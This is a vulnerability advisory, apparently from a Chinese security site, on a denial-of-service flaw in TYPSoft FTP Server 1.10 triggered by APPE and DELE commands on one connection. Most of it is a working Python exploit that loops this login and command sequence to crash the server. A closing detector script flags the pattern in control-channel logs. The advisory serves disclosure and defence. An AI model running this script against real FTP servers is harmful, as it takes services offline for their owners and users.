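TYPSoft FTP Server APPE and DELE Commands Remote Denial of Service Vulnerability
Source: 岁月联盟
Date: 2009-11-28
TYPSoft TYPSoft FTP Server 1.10
Vulnerability description:
BUGTRAQ ID: 37114
TYPSoft FTP Server is a simple, easy-to-use FTP server program.
TYPSoft FTP Server contains a denial of service vulnerability: after logging in to the server, a user who issues the APPE and DELE commands together on the same socket connection causes the server to crash: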
sock.connect((hostname, 21))
sock.send("user %s\r\n" % username)
sock.send("pass %s\r\n" % passwd)
sock.send("PORT 127,0,0,1,122,107\r\n")
sock.send("APPE " + test_string + "\r\n")
sock.send("DELE " + test_string + "\r\n")
sock.close()
<*Reference
leinakesi (leinakesi@gmail.com)
*>
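Test method:
[www.sebug.net]
The programs (methods) provided by this site may have security implications and are intended for security research and teaching only; use at your own risk!
Exploit example: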
#!/usr/bin/python
import socket
import sys
import time

def Usage():
    print ("Usage: ./expl.py <local_ip> <serv_ip> <Username> <password>\n")
    print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")
    print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")

if len(sys.argv) != 5:
    Usage()
    sys.exit(1)
else:
    local=sys.argv[1]
    hostname=sys.argv[2]
    username=sys.argv[3]
    passwd=sys.argv[4]
test_string="a"*30
# Octets of the local address, used to build the PORT argument
ip_every=local.split('.')
for i in range(1,10000):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r
    # Data listener on port 31339 (122*256 + 107), matching the PORT command below
    sock_data.bind((local,31339))
    sock_data.listen(1)
    sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + \
        ip_every[3] + ",122,107\r\n")
    print "[-] "+ ("PORT " + local + "122,107\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    # APPE followed by DELE on the same control connection
    sock.send("APPE "+ test_string +"\r\n")
    print "[-] "+ ("APPE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("DELE "+ test_string +"\r\n")
    print "[-] "+ ("DELE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    sock.close()
    sock_data.close()
    time.sleep(2)
sys.exit(0)
SEBUG security recommendation:
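Vendor patch:
TYPSoft
-------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://en.typsoft.com/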
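
With no vendor patch available, the sequence described above can at least be watched for on the FTP control channel. The following detector is an added example, not part of the original advisory or of any TYPSoft tooling; the log format ("<session> <C|S> <FTP line>") and the sample log are constructed for illustration. It flags any DELE a client sends while an APPE on the same session has not yet received a final reply, which is slightly broader than the same-filename case shown in the advisory.

```python
import re

# Constructed control-channel log: "<session> <C|S> <FTP line>".
# C = client command, S = server reply. This format is an assumption.
SAMPLE_LOG = """\
s1 C USER anonymous
s1 S 331 Password required
s1 C PASS anonymous
s1 S 230 Logged in
s1 C PORT 127,0,0,1,122,107
s1 S 200 PORT command successful
s1 C APPE aaaaaaaaaa
s1 S 150 Opening data connection
s1 C DELE aaaaaaaaaa
s2 C APPE report.txt
s2 S 150 Opening data connection
s2 S 226 Transfer complete
s2 C DELE report.txt
s2 S 250 File deleted
"""

LINE_RE = re.compile(r"^(\S+) ([CS]) (.*)$")


def find_dele_during_appe(log_text):
    """Return [(session, appe_target, dele_target)] for each DELE that a
    client sent before its outstanding APPE received a final reply."""
    pending = {}  # session -> APPE target still awaiting a final reply
    hits = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        session, side, text = m.groups()
        if side == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "APPE":
                pending[session] = arg
            elif verb == "DELE" and session in pending:
                hits.append((session, pending[session], arg))
        elif text[:3].isdigit() and text[0] in "245":
            # 1xx replies are preliminary; 2xx/4xx/5xx end the transfer.
            pending.pop(session, None)
    return hits
```

A hit on a session that then disconnects without a server reply is worth correlating with service crash or restart events on the FTP host.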